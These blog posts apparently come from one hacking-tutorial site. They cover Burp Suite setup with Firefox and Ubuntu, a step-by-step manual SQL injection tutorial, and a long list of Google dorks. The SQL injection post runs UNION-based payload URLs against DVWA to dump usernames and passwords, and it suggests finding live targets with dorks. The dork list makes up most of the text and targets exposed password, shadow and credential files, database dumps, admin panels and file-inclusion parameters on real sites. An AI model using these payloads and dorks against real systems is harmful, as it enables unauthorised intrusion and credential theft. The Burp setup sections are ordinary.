how to configure burpsuite with firefox?

Namaste Hackers,



Today, In this Post, I am going to show you about how you can Setup and Configure your Firefox web browser with Burpsuite Applications.

So, let's Start Our Tutorial With Some Basic Understanding.

About BurpSuite Application

Burp Suite is a Java application, specially designed for performing security tests and vulnerability scanning. Its capabilities include brute force tool, spider tools, Http Request Intercepting tool, repeater tool, intruder tool, sequencer tool, and many others. read more>>>

How to install it?


Follow This link to get detail setup information.. click here


Configure BurpSuite With Firefox

Step 1.

Run BurpSuite 



Select Temporary Project.


Step 2.

Click On Start Burp Button



Step 3.

Wait For Few Minutes


Step 4.

Click on Proxy Tab, And There Click On Option Tab as Shown Below.


From Here, Note Your Interface Address And Port.

Step 5.

Open Firefox Browser, Now To Configure Firefox Go to Options And There Click On Preference As Given Below.




Step 6.

Go to Advanced >> Network > Settings



Step 7.

Set Manual Proxy Configuration And Set HTTP Proxy, Port As Given On BurpSuite Option Tab.
For More Detail Check Screenshot Below.


Step 8.

Turn On Intercept Option Given at BurpSuite Proxy Tab. Done! Now, Your Burpsuite And Firefox browser are ready to use.




Written By :
                  SSB















how to install burp suite in Linux/Ubuntu 16.04

Namaste Hackers,



In This Post, I Am going to show you how to install burp suite application in Linux/Ubuntu.

Burp Suite Application


Burp Suite is a Java application, specially designed for performing security tests and vulnerability scanning. Its capabilities include brute force tool, spider tools, Http Request Intercepting tool, repeater tool, intruder tool, sequencer tool, and many others.      read more >>>


So, Let's Start.


Step 1.
          First, We will install Java and for this just open your terminal and type:


COMMAND: sudo apt-get install openjdk-8-jre





Step 2.
           Now, Click Here And Download BurpSuite Free Edition Linux File. (file extension: .sh) Once You have Download Burpsuite linux file. Open Your Terminal And Type :

Command : sudo bash path/to/download/file



Step 3.

              Now, BurpSuite Setup Wizard Will Appear. So, Just Click Next Button.

 



Step 4.

        Click Next Button.





Step 5.

             Click Next Button.



Step 6.
 
        Click Finish Button and here, now our burp suite is now installed in our system.






Step 7. 


         To Run Burp Suite Open Your Terminal and Type:


Command  : sudo /opt/BurpSuiteFree/BurpSuiteFree 

Or 

Search For BurpSuite in Menu Window Located in Upper Left Corner Of Ubuntu.



Tutorial Complete!


Written By 
                SSB

What is Burp Suite And its Features?

Hello Friends,



Today, In This Post I am going to Introduce A Very Popular Penetration Testing Tool Called Burp Suite. 

Q1. What is Burp Suite?

Ans. Burp Suite is a Java application, specially designed for performing security tests and vulnerability scanning. Its capabilities include brute force tool, spider tools, Http Request Intercepting tool, repeater tool, intruder tool, sequencer tool, and many others. The software was designed and launched by PortSwigger Ltd and According To Burp Suite Official Website Definition: '''Burp Suite is an integrated platform for performing security testing of web applications. It is not a point-and-click tool but is designed to be used by hands-on testers to support the testing process. With a little bit of effort, anyone can start using the core features of Burp to test the security of their applications. Some of Burp's more advanced features will take further learning and experience to master. All of this investment is hugely worth it - Burp's user-driven workflow is by the far the most effective way to perform web security testing and will take you way beyond the capabilities of any conventional point-and-click scanner. Burp is intuitive and user-friendly, and the best way to start learning is by doing. These steps will get you started with running Burp and using its basic features. You can then read on deeper into the documentation to become more proficient in using this supremely powerful tool.'''


Q2. What Are The Features Of Burp Suite?


Ans. There are many types of valuable features available in burpsuite but here, I am highlighting some important point according to my personal opinion on burpsuite.

  • Very Light Weight And Stable
  • Cross-Platform Supported
  • Well Design User Interface
  • Can Work With Almost All Browsers.
  • Can Help in crawling Website
  • Can help in scanning Http/Https Request and Response
  • Can Perform customize attacks 

And Lots Of Other Features like Sending Customize Requests, Performing Cookie Exploitation Attack, SQL Injection Attacks, Brute Force Attacks And Much More




Q3. How burp suite works?

Ans. Burp Suite is a Java Application that's act like a web proxy server between your browser and Internet Connection. In Simple Words, This Application run as a middle point between your browser and internet. This Feature allows burp suite to perform all security scannings, interception and modification of Http Requests, Analysing Web Server response, finding vulnerabilities, mapping attacks and performing many other types of attacks also.


Q 4. How to install it?

Ans. Follow This Links To Installation Instruction Of Burp Suite Application. click here


Conclusion:
Burp Suite is Really Very Impressive Tools For Web Application Penetration Testing. 




Written By:
                  SSB

how to do SQL Injection Manually

Namaste Friends,



Today, In This Post I Am Going To Show You How To Manually Perform SQL Injection Attacks On Web sites.

So, Let's Quickly Start Our Tutorial.

What Is SQL Injection Attack?


SQL injection is one type of vulnerability in web server. In Which, Attacker Can Insert

different type of SQL statements, syntax and commands (also commonly refers to as a malicious

payload.) and can also execute that statements on the server. read more >>


Friends Here, For Practise Purpose I Am Using DVWA (Damn Vulnerable Web application) On Local Server. As You Can See In Below Image But if you are new, read here >>>

SQL Injection Manually Tutorial Steps

Step 1.

                Our First Step is to find a target URL to exploit the sql vulnerability. Here, I am Using Metasploit-able vulnerable machine as target URL but you can also find live targets with the help of google dorks. For Google Dorks Usages Read Here

Target Url :

                 http://192.168.1.101/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#




Step 2.

               Now, Our Second Step is To Verify That Our Selected Target Url is Vulnerable For SQL Injection Attack and for this, you just need to add '  after "=" Sign Or After The Number Query in Url.

After Editing Our Url Will Look Like This:


 http://192.168.1.101/dvwa/vulnerabilities/sqli/?id=1'&Submit=Submit#
or
 http://192.168.1.101/dvwa/vulnerabilities/sqli/?id='1&Submit=Submit#

And After Submitting Url, If You Get Any Type Of SQL Error Message Than Your Selected Target Is Vulnerable Of SQL Injection. As You Can See In Below ScreenShot.




Step 3.

            Now, We Need To Make Our URL Stable For Injecting Our SQL Statements Through URL.
And For This, You Just Need To Add --+ or # After The ' Query.

Then, Our Url Will Look Like This:

http://192.168.1.101/dvwa/vulnerabilities/sqli/?id=1'--+&Submit=Submit#

And After Submitting This Url, If Our Webpage is not showing any type of error that means our URL is now stable for injecting SQL Query.




Step 4.

              Now, Our Next Move Is To Find Total Number Of Columns Present In Current Working Table.
And For This, We Just Need To Add ' order by n' where n is a number of columns. basically, here we will use incrementing values and try to guess a number of columns available in the table. so, what we will do? we will increase column number one by one until Webpage Not Provide us Unknown Column Error Because with Unknown Columns Error We Can Easily Guess Numbers Of Columns Present In Table. For Example


http://192.168.1.101/dvwa/vulnerabilities/sqli/?id=1' order by n --+&Submit=Submit#


http://192.168.1.101/dvwa/vulnerabilities/sqli/?id=1' order by 1 --+&Submit=Submit# --> No Error

http://192.168.1.101/dvwa/vulnerabilities/sqli/?id=1' order by 2 --+&Submit=Submit# --> No Error

http://192.168.1.101/dvwa/vulnerabilities/sqli/?id=1' order by 3 --+&Submit=Submit# --> Error

Here, As you Can See We Get Error On Number 3 Column Means There are Only 2 Columns Available In Table.





Step 5.

           Now, We Know that there are 2 columns available in the table. so,  Our Next Step Is To Find Vulnerable Column In MySql And For This We Will Just Add Some Value In Place Of Column To Verify Their Presence In Web page Source.

For Example:

http://192.168.1.101/dvwa/vulnerabilities/sqli/?id=1' UNION SELECT 111, 101 --+&Submit=Submit#

After Submitting, Pay Attention to Webpage Content and try to find our injected column values in the webpage as you can see in below screenshot, Both Columns Are Vulnerable For SQL Injection.




Step 6.

           Now, We Know Which Column is Vulnerable For SQL injection. So, Let's Use This Vulnerable Column To Find Table names Available In Current Database.

To Find All Table Names :  http://192.168.1.101/dvwa/vulnerabilities/sqli/?id=1' UNION SELECT null, table_name FROM information_schema.tables --+&Submit=Submit#


To Find Current Table Name : http://192.168.1.101/dvwa/vulnerabilities/sqli/?id=1' UNION SELECT null, table_name FROM information_schema.tables WHERE table_schema=database() --+&Submit=Submit#

As You Can See In below ScreenShot, Webpage Is Showing Name Of Tables Available In Database.




Step 7.

           Now, We Know Which Columns are Vulnerable For SQL injection And Current Table Name. So, Let's Use This Information To Find Numbers Of Columns Available In Current Database Tables.

To Find All Column Names :  http://192.168.1.101/dvwa/vulnerabilities/sqli/?id=1' UNION SELECT null, column_name FROM information_schema.columns WHERE table_schema=database() --+&Submit=Submit#


As You Can See In below ScreenShot, Webpage Is Showing Name Of Tables Available In Database.







Step 8.

             At The End, To Extract user and password columns from Table. Enter Below Commands.

URL: http://192.168.1.101/dvwa/vulnerabilities/sqli/?id=1' UNION SELECT user, password FROM users --+&Submit=Submit#






Done!


Written By:
                 SSB











Latest Google Dorks List

Namaste Friends,



Today, In this post, I am going to share with you latest List Of Google Dorks And Some Useful Information About Google Dorks.



Google Dorks






Google Dork is a special string for finding any specified or restricted result from any specified website or from the whole Internet with the help of Google Search Engine. These Strings are built with the advanced search operators supported by Google Search Engine. Normally, Google Dorks are used by security researchers, network admins, web developers, IT Professionals and other Networking Experts For Finding Their Filtered limited results.

In Simple Words, Google Dork is a sequence of character that can be used for finding any type of Exact Or Restricted Result Or File With the help of Google Search Engine. For Example: With Google Dork, You Can Find any specified file downloading link directly in Google Search Engine Result Page.


Now, Let Me Show You Some Commonly Used Search Engine Operators But First, I Want To Declare That I Will Not Take Any Type Of Responsibility So, Use These Dorks On your Own Responsibility.  





 Google Dorks Usages

Site :


 This operator helps to get our result from any certain domain name Or Url.

 Example:

                 "site:www.examlpesite.com" other_query

Inurl :


  Allow us to find specified URLs that contain provided queries or string in it. 


 Example:
                 "inurl:login.php" other_query

Filetype :


            Find Links Of Files That Contain User Specified File Extensions.

 Example:
                 "filetype:mp3" song_name

Intext :


 Find Webpages that contain provided string in its data.


 Example:
                 "intext:text" additional_query

Intitle :


Find Webpages that contain provided title in its title string.


 Example:
                 "intitle:text_string" aditional_query

And Several others.


Latest Google Dorks


Vulnerable File Searching Dorks



filetype:asp "Custom Error Message" Category Source
filetype:asp + "[ODBC SQL"
filetype:ASP ASP
filetype:asp DBQ=" * Server.MapPath("*.mdb")
filetype:ASPX ASPX
filetype:bak createobject sa
filetype:bak inurl:"htaccess|passwd|shadow|htusers"
filetype:bkf bkf
filetype:blt "buddylist"
filetype:blt blt +intext:screenname
filetype:BML BML
filetype:cfg auto_inst.cfg
filetype:cfg ks intext:rootpw -sample -test -howto
filetype:cfg mrtg "target
filetype:cfm "cfapplication name" password
filetype:CFM CFM
filetype:CGI CGI
filetype:cgi inurl:"fileman.cgi"
filetype:cgi inurl:"Web_Store.cgi"
filetype:cnf inurl:_vti_pvt access.cnf
filetype:conf inurl:firewall -intitle:cvs
filetype:conf inurl:psybnc.conf "USER.PASS="
filetype:conf oekakibbs
filetype:conf slapd.conf
filetype:config config intext:appSettings "User ID"
filetype:config web.config -CVS
filetype:ctt Contact
filetype:ctt ctt messenger
filetype:dat "password.dat
filetype:dat "password.dat"
filetype:dat inurl:Sites.dat
filetype:dat wand.dat
filetype:DIFF DIFF
filetype:DLL DLL
filetype:DOC DOC
filetype:eml eml +intext:"Subject" +intext:"From" +intext:"To"
filetype:FCGI FCGI
filetype:fp3 fp3
filetype:fp5 fp5 -site:gov -site:mil -"cvs log"
filetype:fp7 fp7
filetype:HTM HTM
filetype:HTML HTML
filetype:inc dbconn
filetype:inc intext:mysql_connect
filetype:inc mysql_connect OR mysql_pconnect
filetype:inf inurl:capolicy.inf
filetype:inf sysprep
filetype:ini inurl:"serv-u.ini"
filetype:ini inurl:flashFXP.ini
filetype:ini ServUDaemon
filetype:ini wcx_ftp
filetype:ini ws_ftp pwd
filetype:JHTML JHTML
filetype:JSP JSP
filetype:ldb admin
filetype:lic lic intext:key
filetype:log "PHP Parse error" | "PHP Warning" | "PHP Error"
filetype:log "See `ipsec --copyright"
filetype:log access.log -CVS
filetype:log cron.log
filetype:log intext:"ConnectionManager2"
filetype:log inurl:"password.log"
filetype:log inurl:password.log
filetype:mbx mbx intext:Subject
filetype:mdb inurl:users.mdb
filetype:mdb wwforum
filetype:MV MV
filetype:myd myd -CVS
filetype:netrc password
filetype:ns1 ns1
filetype:ora ora
filetype:ora tnsnames
filetype:pass pass intext:userid
filetype:pdb pdb backup (Pilot | Pluckerdb)
filetype:pdf "Assessment Report" nessus
filetype:PDF PDF
filetype:pem intext:private
filetype:php inurl:"logging.php" "Discuz" error
filetype:php inurl:"webeditor.php"
filetype:php inurl:index inurl:phpicalendar -site:sourceforge.net
filetype:php inurl:ipinfo.php "Distributed Intrusion Detection System"
filetype:php inurl:nqt intext:"Network Query Tool"
filetype:php inurl:vAuthenticate
filetype:PHP PHP
filetype:PHP3 PHP3
filetype:PHP4 PHP4
filetype:PHTML PHTML
filetype:pl "Download: SuSE Linux Openexchange Server CA"
filetype:pl intitle:"Ultraboard Setup"
filetype:PL PL
filetype:pot inurl:john.pot
filetype:PPT PPT
filetype:properties inurl:db intext:password
filetype:PS ps
filetype:PS PS
filetype:pst inurl:"outlook.pst"
filetype:pst pst -from -to -date
filetype:pwd service
filetype:pwl pwl
filetype:qbb qbb
filetype:QBW qbw
filetype:r2w r2w
filetype:rdp rdp
filetype:reg "Terminal Server Client"
filetype:reg reg +intext:"defaultusername" +intext:"defaultpassword"
filetype:reg reg +intext:â? WINVNC3â?
filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS
filetype:SHTML SHTML
filetype:sql "insert into" (pass|passwd|password)
filetype:sql ("values * MD5" | "values * password" | "values * encrypt")
filetype:sql +"IDENTIFIED BY" -cvs
filetype:sql password
filetype:STM STM
filetype:SWF SWF
filetype:TXT TXT
filetype:url +inurl:"ftp://" +inurl:";@"
filetype:vcs vcs
filetype:vsd vsd network -samples -examples
filetype:wab wab
filetype:xls -site:gov inurl:contact
filetype:xls inurl:"email.xls"
filetype:xls username password email
filetype:XLS XLS

Special Message Search Dorks



" -FrontPage-" ext:pwd inurl:(service | authors | administrators | users)
": vBulletin Version 1.1.5"
"# -FrontPage-" ext:pwd inurl:(service | authors | administrators | users) "# -FrontPage-" inurl:service.pwd
"#mysql dump" filetype:sql
"#mysql dump" filetype:sql 21232f297a57a5a743894a0e4a801fc3
"A syntax error has occurred" filetype:ihtml
"About Mac OS Personal Web Sharing"
"access denied for user" "using password"
"allow_call_time_pass_reference" "PATH_INFO"
"An illegal character has been found in the statement" -"previous message"
"apricot - admin" 00h
"ASP.NET_SessionId" "data source="
"AutoCreate=TRUE password=*"
"bp blog admin" intitle:login | intitle:admin -site:johnny.ihackstuff.com
"Can't connect to local" intitle:warning
"Certificate Practice Statement" inurl:(PDF | DOC)
"Chatologica MetaSearch" "stack tracking:"
"Chatologica MetaSearch" "stack tracking"
"detected an internal error [IBM][CLI Driver][DB2/6000]"
"Duclassified" -site:duware.com "DUware All Rights reserved"
"duclassmate" -site:duware.com
"Dudirectory" -site:duware.com
"dudownload" -site:duware.com
"Dumping data for table"
"DUpaypal" -site:duware.com
"Elite Forum Version *.*"
"Emergisoft web applications are a part of our"
"Error Diagnostic Information" intitle:"Error Occurred While"
"error found handling the request" cocoon filetype:xml
"Establishing a secure Integrated Lights Out session with" OR intitle:"Data Frame - Browser not HTTP 1.1 compatible" OR intitle:"HP Integrated Lights-
"Fatal error: Call to undefined function" -reply -the -next
"ftp://" "www.eastgame.net"
"Host Vulnerability Summary Report"
"HostingAccelerator" intitle:"login" +"Username" -"news" -demo
"html allowed" guestbook
"HTTP_FROM=googlebot" googlebot.com "Server_Software="
"http://*:*@www" domainname
"iCONECT 4.1 :: Login"
"IMail Server Web Messaging" intitle:login
"Incorrect syntax near"
"Invision Power Board Database Error"
"Link Department"
"liveice configuration file" ext:cfg
"liveice configuration file" ext:cfg -site:sourceforge.net
"Login - Sun Cobalt RaQ"
"login prompt" inurl:GM.cgi
"Login to Usermin" inurl:20000
"MacHTTP" filetype:log inurl:machttp.log
"Mecury Version" "Infastructure Group"
"Microsoft (R) Windows * (TM) Version * DrWtsn32 Copyright (C)" ext:log
"Microsoft ® Windows * ™ Version * DrWtsn32 Copyright ©" ext:log
"Microsoft CRM : Unsupported Browser Version"
"More Info about MetaCart Free"
"Most Submitted Forms and s?ri?ts" "this section"
"Most Submitted Forms and Scripts" "this section"
"mysql dump" filetype:sql
"mySQL error with query"
"Network Host Assessment Report" "Internet Scanner"
"Network Vulnerability Assessment Report"
"not for distribution" confidential
"not for public release" -.edu -.gov -.mil
"OPENSRS Domain Management" inurl:manage.cgi
"ORA-00921: unexpected end of SQL command"
"ORA-00933: SQL command not properly ended"
"ORA-00936: missing expression"
"ORA-12541: TNS:no listener" intitle:"error occurred"
"Output produced by SysWatch *"
"Parse error: parse error, unexpected T_VARIABLE" "on line" filetype:php
"pcANYWHERE EXPRESS Java Client"
"phone * * *" "address *" "e-mail" intitle:"curriculum vitae"
"Phorum Admin" "Database Connection" inurl:forum inurl:admin
"phpMyAdmin MySQL-Dump" "INSERT INTO" -"the"
"phpMyAdmin MySQL-Dump" filetype:txt
"phpMyAdmin" "running on" inurl:"main.php"
"Please authenticate yourself to get access to the management interface"
"please log in"
"Please login with admin pass" -"leak" -sourceforge
"PostgreSQL query failed: ERROR: parser: parse error"
"powered | performed by Beyond Security's Automated Scanning" -kazaa -example
"Powered by mnoGoSearch - free web search engine software"
"powered by openbsd" +"powered by apache"
"Powered by UebiMiau" -site:sourceforge.net
"produced by getstats"
"Request Details" "Control Tree" "Server Variables"
"robots.txt" "Disallow:" filetype:txt
"Running in Child mode"
"Select a database to view" intitle:"filemaker pro"
"set up the administrator user" inurl:pivot
"sets mode: +k"
"sets mode: +p"
"sets mode: +s"
"Shadow Security Scanner performed a vulnerability assessment"
"site info for" "Enter Admin Password"
"SnortSnarf alert page"
"SQL Server Driver][SQL Server]Line 1: Incorrect syntax near"
"SquirrelMail version" "By the SquirrelMail development Team"
"Supplied argument is not a valid MySQL result resource"
"Supplied argument is not a valid PostgreSQL result"
"Syntax error in query expression " -the
"SysCP - login"
"Thank you for your order" +receipt
"The following report contains confidential information" vulnerability -search
"The s?ri?t whose uid is " "is not allowed to access"
"The script whose uid is " "is not allowed to access"
"The statistics were last upd?t?d" "Daily"-microsoft.com
"There are no Administrators Accounts" inurl:admin.php -mysql_fetch_row
"There seems to have been a problem with the" " Please try again by clicking the Refresh button in your web browser."
"This is a restricted Access Server" "Javas?ri?t Not Enabled!"|"Messenger Express" -edu -ac
"This is a Shareaza Node"
"this proxy is working fine!" "enter *" "URL***" * visit
"This report lists" "identified by Internet Scanner"
"This report was generated by WebLog"
"This section is for Administrators only. If you are an administrator then please"
"This summary was generated by wwwstat"
"Traffic Analysis for" "RMON Port * on unit *"
"ttawlogin.cgi/?action="
"Unable to jump to row" "on MySQL result index" "on line"
"Unclosed quotation mark before the character string"
"Version Info" "Boot Version" "Internet Settings"
"VHCS Pro ver" -demo
"VNC Desktop" inurl:5800
"Warning: Bad arguments to (join|implode) () in" "on line" -help -forum
"Warning: Cannot modify header information - headers already sent"
"Warning: Division by zero in" "on line" -forum
"Warning: mysql_connect(): Access denied for user: '*@*" "on line" -help -forum
"Warning: mysql_query()" "invalid query"
"Warning: pg_connect(): Unable to connect to PostgreSQL server: FATAL"
"Warning: Supplied argument is not a valid File-Handle resource in"
"Warning:" "failed to open stream: HTTP request failed" "on line"
"Warning:" "SAFE MODE Restriction in effect." "The s?ri?t whose uid is" "is not allowed to access owned by uid 0 in" "on line"
"Warning:" "SAFE MODE Restriction in effect." "The script whose uid is" "is not allowed to access owned by uid 0 in" "on line"
"Web File Browser" "Use regular expression"
"Web-Based Management" "Please input password to login" -inurl:johnny.ihackstuff.com
"WebExplorer Server - Login" "Welcome to WebExplorer Server"
"WebSTAR Mail - Please Log In"
"Welcome to Administration" "General" "Local Domains" "SMTP Authentication" inurl:admin
"Welcome to Intranet"
"Welcome to PHP-Nuke" congratulations
"Welcome to the Prestige Web-Based Configurator"
"xampp/phpinfo
"YaBB SE Dev Team"
"you can now password" | "this is a special page only seen by you. your profile visitors" inurl:imchaos
"You have an error in your SQL syntax near"
"You have requested access to a restricted area of our website. Please authenticate yourself to continue."
"You have requested to access the management functions" -.edu
"Your password is * Remember this for later use"
"your password is" filetype:log
( filetype:mail | filetype:eml | filetype:mbox | filetype:mbx ) intext:password|subject
("Indexed.By"|"Monitored.By") hAcxFtpScan
((inurl:ifgraph "Page generated at") OR ("This page was built using ifgraph"))
(intitle:"Please login - Forums
(intitle:"PRTG Traffic Grapher" inurl:"allsensors")|(intitle:"PRTG Traffic Grapher - Monitoring Results")
(intitle:"rymo Login")|(intext:"Welcome to rymo") -family
(intitle:"WmSC e-Cart Administration")|(intitle:"WebMyStyle e-Cart Administration")
(intitle:WebStatistica inurl:main.php) | (intitle:"WebSTATISTICA server") -inurl:statsoft -inurl:statsoftsa -inurl:statsoftinc.com -edu -software -rob
(inurl:"ars/cgi-bin/arweb?O=0" | inurl:arweb.jsp) -site:remedy.com -site:mil
(inurl:"robot.txt" | inurl:"robots.txt" ) intext:disallow filetype:txt
(inurl:/shop.cgi/page=) | (inurl:/shop.pl/page=)


Vulnerable Index Pages Dorks



"parent directory " /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory " Name of Singer or album -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory "Xvid -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
"parent directory" +proftpdpasswd
"Index of /" +.htaccess
"Index of /" +passwd
"Index of /" +password.txt
"Index of /admin"
"Index of /backup"
"Index of /mail"
"Index Of /network" "last modified"
"Index of /password"
"index of /private" -site:net -site:com -site:org
"index of /private" site:mil
"Index of" / "chat/logs"
"index of/" "ws_ftp.ini" "parent directory"



File Inclusion Vulnerability Dorks



impex/ImpExData.php?systempath=
inc/cmses/aedating4CMS.php?dir[inc]=
inc/cmses/aedating4CMS.php?dir[inc]= inurl:flashchat site:br bp_ncom.php?bnrep=
inc/cmses/aedatingCMS.php?dir[inc]=
inc/functions.inc.php?config[ppa_root_path]=
inc/header.php/step_one.php?server_inc=
inc/pipe.php?HCL_path=
include.php?*[*]*=
include.php?adresa=
include.php?b=
include.php?basepath=
include.php?channel=
include.php?chapter=
include.php?cmd=
include.php?cont=
include.php?content=
include.php?corpo=
include.php?destino=
include.php?dir=
include.php?eval=
include.php?filepath=
include.php?go=
include.php?goFile=
include.php?goto=
include.php?header=
include.php?in=
include.php?include=
include.php?index=
include.php?ir=
include.php?ki=
include.php?left=
include.php?loader=
include.php?loc=
include.php?mid=
include.php?middle=
include.php?middlePart=
include.php?module=
include.php?my=
include.php?name=
include.php?nivel=
include.php?numero=
include.php?oldal=
include.php?option=
include.php?pag=
include.php?pageweb=
include.php?panel=
include.php?path=
include.php?phpbb_root_path=
include.php?play=
include.php?read=
include.php?redirect=
include.php?ref=
include.php?sec=
include.php?secao=
include.php?seccion=
include.php?second=
include.php?sivu=
include.php?tipo=
include.php?to=
include.php?u=
include.php?url=
include.php?w=
include.php?x=
include/editfunc.inc.php?NWCONF_SYSTEM[server_path]=
include/new-visitor
include/new-visitor.inc.php?lvc_include_dir=
include/write.php?dir=
includes/functions.php?phpbb_root_path=
includes/header.php?systempath=
includes/search.php?GlobalSettings[templatesDirectory]=


Special Intext Dorks



intext:""BiTBOARD v2.0" BiTSHiFTERS Bulletin Board"
intext:"d.aspx?id" || inurl:"d.aspx?id"
intext:"enable password 7"
intext:"enable secret 5 $"
intext:"Error Message : Error loading required libraries."
intext:"EZGuestbook"
intext:"Fill out the form below completely to change your password and user name. If new username is left blank, your old one will be assumed." -edu
intext:"Mail admins login here to administrate your domain."
intext:"Master Account" "Domain Name" "Password" inurl:/cgi-bin/qmailadmin
intext:"Powered By : SE Software Technologies" filetype:php
intext:"powered by Web Wiz Journal"
intext:"Session Start * * * *:*:* *" filetype:log
intext:"SteamUserPassphrase=" intext:"SteamAppUser=" -"username" -"user"
intext:"Storage Management Server for" intitle:"Server Administration"
intext:"Tobias Oetiker" "traffic analysis"
intext:"vbulletin" inurl:admincp
intext:"Warning: * am able * write ** configuration file" "includes/configure.php" -
intext:"Warning: Failed opening" "on line" "include_path"
intext:"Web Wiz Journal"
intext:"Welcome to the Web V.Networks" intitle:"V.Networks [Top]" -filetype:htm
intext:"Welcome to" inurl:"cp" intitle:"H-SPHERE" inurl:"begin.html" -Fee
intext:(password | passcode) intext:(username | userid | user) filetype:csv
intext:gmail invite intext:http://gmail.google.com/gmail/a
intext:SQLiteManager inurl:main.php


Special Intitile Dorks



intitle:"--- VIDEO WEB SERVER ---" intext:"Video Web Server" "Any time & Any where" username password
intitle:"*- HP WBEM Login" | "You are being prompted to provide login account information for *" | "Please provide the information requested and press
intitle:"500 Internal Server Error" "server at"
intitle:"actiontec" main setup status "Copyright 2001 Actiontec Electronics Inc"
intitle:"Admin Login" "admin login" "blogware"
intitle:"Admin login" "Web Site Administration" "Copyright"
intitle:"admin panel" +"
intitle:"admin panel" +"RedKernel"
intitle:"ADSL Configuration page"
intitle:"AlternC Desktop"
intitle:"Apache Tomcat" "Error Report"
intitle:"Apache::Status" (inurl:server-status | inurl:status.html | inurl:apache.html)
intitle:"AppServ Open Project" -site:www.appservnetwork.com
intitle:"ASP Stats Generator *.*" "ASP Stats Generator" "2003-2004 weppos"
intitle:"Athens Authentication Point"
intitle:"Azureus : Java BitTorrent Client Tracker"
intitle:"b2evo > Login form" "Login form. You must log in! You will have to accept cookies in order to log in" -demo -site:b2evolution.net
intitle:"Belarc Advisor Current Profile" intext:"Click here for Belarc's PC Management products, for large and small companies."
intitle:"Big Sister" +"OK Attention Trouble"
intitle:"BNBT Tracker Info"
intitle:"Browser Launch Page"
intitle:"Cisco CallManager User Options Log On" "Please enter your User ID and Password in the spaces provided below and click the Log On button to co
intitle:"ColdFusion Administrator Login"
intitle:"communigate pro * *" intitle:"entrance"
intitle:"Connection Status" intext:"Current login"
intitle:"Content Management System" "user name"|"password"|"admin" "Microsoft IE 5.5" -mambo
intitle:"curriculum vitae" filetype:doc
intitle:"Default PLESK Page"
intitle:"Dell Remote Access Controller"
intitle:"DocuShare" inurl:"docushare/dsweb/" -faq -gov -edu
intitle:"Docutek ERes - Admin Login" -edu
intitle:"edna:streaming mp3 server" -forums
intitle:"Employee Intranet Login"
intitle:"eMule *" intitle:"- Web Control Panel" intext:"Web Control Panel" "Enter your password here."
intitle:"ePowerSwitch Login"
intitle:"Error Occurred While Processing Request" +WHERE (SELECT|INSERT) filetype:cfm
intitle:"Error Occurred" "The error occurred in" filetype:cfm
intitle:"Error using Hypernews" "Server Software"
intitle:"EverFocus.EDSR.applet"
intitle:"Execution of this s?ri?t not permitted"
intitle:"Execution of this script not permitted"
intitle:"eXist Database Administration" -demo
intitle:"EXTRANET * - Identification"
intitle:"EXTRANET login" -.edu -.mil -.gov
intitle:"EZPartner" -netpond
intitle:"Flash Operator Panel" -ext:php -wiki -cms -inurl:asternic -inurl:sip -intitle:ANNOUNCE -inurl:lists
intitle:"FTP root at"
intitle:"Gateway Configuration Menu"
intitle:"Horde :: My Portal" -"[Tickets"
intitle:"i-secure v1.1" -edu
intitle:"Icecast Administration Admin Page"
intitle:"iDevAffiliate - admin" -demo
intitle:"inc. vpn 3000 concentrator"
intitle:"Index of..etc" passwd
intitle:"Index Of" -inurl:maillog maillog size
intitle:"Index of" .bash_history
intitle:"Index of" .mysql_history
intitle:"Index of" .sh_history
intitle:"Index of" ".htpasswd" "htgroup" -intitle:"dist" -apache -htpasswd.c
intitle:"index of" +myd size
intitle:"Index of" cfide
intitle:"Index Of" cookies.txt size
intitle:"index of" etc/shadow
intitle:"index of" htpasswd
intitle:"index of" intext:connect.inc
intitle:"index of" intext:globals.inc
intitle:"index of" master.passwd
intitle:"index of" members OR accounts
intitle:"index of" mysql.conf OR mysql_config
intitle:"index of" passwd
intitle:"Index of" passwords modified
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"Index of" pwd.db
intitle:"Index of" sc_serv.conf sc_serv content
intitle:"index of" spwd
intitle:"Index of" spwd.db passwd -pam.conf
intitle:"Index of" upload size parent directory
intitle:"index of" user_carts OR user_cart
intitle:"index.of *" admin news.asp configview.asp
intitle:"index.of" .diz .nfo last modified
intitle:"ISPMan : Unauthorized Access prohibited"
intitle:"ITS System Information" "Please log on to the SAP System"
intitle:"iVISTA.Main.Page"
intitle:"Joomla - Web Installer"
intitle:"Kurant Corporation StoreSense" filetype:bok
intitle:"ListMail Login" admin -demo
intitle:"live view" intitle:axis
intitle:"Login -
intitle:"Login Forum
intitle:"Login to @Mail" (ext:pl | inurl:"index") -dwaffleman
intitle:"Login to Cacti"
intitle:"Login to the forums - @www.aimoo.com" inurl:login.cfm?id=
intitle:"LOGREP - Log file reporting system" -site:itefix.no
intitle:"Mail Server CMailServer Webmail" "5.2"
intitle:"MailMan Login"
intitle:"Member Login" "NOTE: Your browser must have cookies enabled in order to log into the site." ext:php OR ext:cgi
intitle:"Merak Mail Server Web Administration" -ihackstuff.com
intitle:"microsoft certificate services" inurl:certsrv
intitle:"Microsoft Site Server Analysis"
intitle:"MikroTik RouterOS Managing Webpage"
intitle:"Multimon UPS status page"
intitle:"MvBlog powered"
intitle:"MX Control Console" "If you can't remember"
intitle:"Nessus Scan Report" "This file was generated by Nessus"
intitle:"network administration" inurl:"nic"
intitle:"Novell Web Services" "GroupWise" -inurl:"doc/11924" -.mil -.edu -.gov -filetype:pdf
intitle:"Novell Web Services" intext:"Select a service and a language."
intitle:"OfficeConnect Cable/DSL Gateway" intext:"Checking your browser"
intitle:"oMail-admin Administration - Login" -inurl:omnis.ch
intitle:"OnLine Recruitment Program - Login"
intitle:"Philex 0.2*" -s?ri?t -site:freelists.org
intitle:"Philex 0.2*" -script -site:freelists.org
intitle:"PHP Advanced Transfer" (inurl:index.php | inurl:showrecent.php )
intitle:"PHP Advanced Transfer" inurl:"login.php"
intitle:"php icalendar administration" -site:sourceforge.net
intitle:"PHPBTTracker Statistics" | intitle:"PHPBT Tracker Statistics"
intitle:"phpinfo()" +"mysql.default_password" +"Zend s?ri?ting Language Engine"
